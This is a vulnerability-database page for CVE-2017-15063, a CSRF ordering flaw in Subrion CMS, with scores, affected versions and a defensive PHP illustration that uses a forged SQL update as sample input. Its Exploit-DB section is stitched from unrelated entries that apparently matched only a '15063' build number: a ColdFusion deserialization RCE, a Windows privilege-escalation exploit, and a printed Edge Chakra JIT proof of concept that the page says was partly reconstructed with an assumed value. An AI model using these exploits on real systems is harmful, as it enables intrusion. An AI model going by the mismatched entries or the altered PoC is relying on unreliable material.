CVE-2017-15063
Published 2017-10-06
Priority: P3 (36) · high · 8.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.52% (39.9th percentile)
There are CSRF vulnerabilities in Subrion CMS 4.1.x through 4.1.5 (fixed in 4.2.0) because of a logic error: the CSRF-detection code exists, but ia.core.php invokes it only after the request has already been dispatched to its handler, so a state-changing action completes before the token is ever checked. One example the advisory gives is a forged request carrying a query parameter to panel/database.
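The ordering bug described above, as an added illustration that is not Subrion's code and not its actual fix: a dispatcher that runs the action and only then validates the token (the damage is done by the time the check fails), beside one that validates first and refuses GET for state changes. All function names (csrf_token_issue, dispatch_vulnerable, panel_database_action, and so on) and the simulated query log are hypothetical and constructed for the example.

```php
<?php
// Added example (not Subrion's code): why a CSRF check that runs after dispatch is useless.
declare(strict_types=1);

function csrf_token_issue(array &$session): string {
    // Per-session random token, kept server-side and embedded in legitimate forms.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_token_valid(array $session, array $request): bool {
    $expected = $session['csrf_token'] ?? '';
    $given    = $request['token'] ?? '';
    // hash_equals() keeps the comparison constant-time.
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Hypothetical state-changing admin action; appending to $db_log stands in for
// executing the submitted SQL against the site database.
function panel_database_action(array $request, array &$db_log): string {
    $query = (string)($request['query'] ?? '');
    $db_log[] = $query;
    return "executed: $query";
}

// VULNERABLE ordering: the handler runs first, the token is checked afterwards.
function dispatch_vulnerable(array &$session, array $request, array &$db_log): string {
    $result = panel_database_action($request, $db_log); // side effect already happened
    if (!csrf_token_valid($session, $request)) {
        return 'error: CSRF token invalid';               // caller sees an error, query already ran
    }
    return $result;
}

// FIXED ordering: validate before anything with side effects, and reject GET so a
// forged link or <img src> cannot reach the handler at all.
function dispatch_fixed(array &$session, array $request, string $method, array &$db_log): string {
    if ($method !== 'POST') {
        return 'error: method not allowed';
    }
    if (!csrf_token_valid($session, $request)) {
        return 'error: CSRF token invalid';
    }
    return panel_database_action($request, $db_log);
}

// Constructed scenario: a cross-site forged request with no token.
$session = [];
csrf_token_issue($session);
$forged = ['query' => "UPDATE users SET password='x' WHERE id=1"];

$log = [];
echo dispatch_vulnerable($session, $forged, $log), PHP_EOL;
echo 'queries run (vulnerable ordering): ', count($log), PHP_EOL; // non-zero despite the error

$log = [];
echo dispatch_fixed($session, $forged, 'GET', $log), PHP_EOL;
echo 'queries run (fixed ordering): ', count($log), PHP_EOL;      // nothing executed

// A legitimate same-origin POST carrying the session token still works.
$legit = $forged + ['token' => $session['csrf_token']];
echo dispatch_fixed($session, $legit, 'POST', $log), PHP_EOL;
echo 'queries run (fixed ordering, legitimate): ', count($log), PHP_EOL;
```

Run it with `php example.php`. The point to check in any framework audit is the same: find where the CSRF guard is invoked and confirm that no controller, hook or include with side effects executes before that call, not merely that a guard exists somewhere in the request path.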
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intelliants | subrion | <= 4.1.5 | — |
| intelliants | subrion | >= 4.1 < 4.2.0 | 4.2.0 |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
OSV
osv · 2022-05-14 · CVE-2017-15063 [HIGH] Subrion CMS CSRF Vulnerability
GHSA
ghsa · 2022-05-14 · CVE-2017-15063 [HIGH] CWE-352 Subrion CMS CSRF Vulnerability
No detection rules found.
Exploit-DB
exploitdb · 2018-02-07 · CVSS 9.8
CVE-2017-3066 [CRITICAL] Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
---
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote
# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary
Exploit-DB
exploitdb · 2017-10-06 · CVSS 7.8
CVE-2016-3309 [HIGH] Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow
---
Sources:
https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html
https://github.com/siberas/CVE-2016-3309_Reloaded
Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on the affected system. The exploits should work fine on Windows 10 x64 with Creators Update, build 15063.540 (latest version of Win10 before the release of Microsoft's September Updates).
The Visual Studio solution contains three exploits:
CVE-2016-3309_Reloaded_Bitmaps: Exploit using the Bitmaps technique
CVE-2016-3309_Reloaded_Palettes: Exploit using the Palettes technique
CVE-2016-3309_Reloaded_Deadlock: POC exploi
Exploit-DB
exploitdb · 2017-08-17
CVE-2017-8601 Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3
---
'use strict';

// Extraction mangled the warm-up loop header and the start of the final call: the
// "<" of the loop comparison through the "=>" of the arrow function were dropped as
// if they were an HTML tag. They are reconstructed here; the loop bound 0x10000 is an
// assumed JIT warm-up count, not the original value.
function func(a, b, c) {
    a[0] = 1.2;
    b[0] = c;          // storing c into a Uint32Array converts it, calling c.valueOf() for an object
    a[1] = 2.2;
    a[0] = 2.3023e-320;
}

function main() {
    let a = [1.1, 2.2];
    let b = new Uint32Array(100);

    // Warm up so func() is JIT-compiled with a[] assumed to stay a float array.
    for (let i = 0; i < 0x10000; i++) {
        func(a, b, i);
    }

    // The typed-array setter's valueOf() callback changes a[0] to an object in the
    // middle of func(); the optimized code still writes a raw double into a[0] afterwards.
    func(a, b, {valueOf: () => {
        a[0] = {};
        return 0;
    }});

    a[0].toString();
}

main();
// Tested on Microsoft Edge 40.15063.0.0 (Insider Preview).
No writeups or analysis indexed.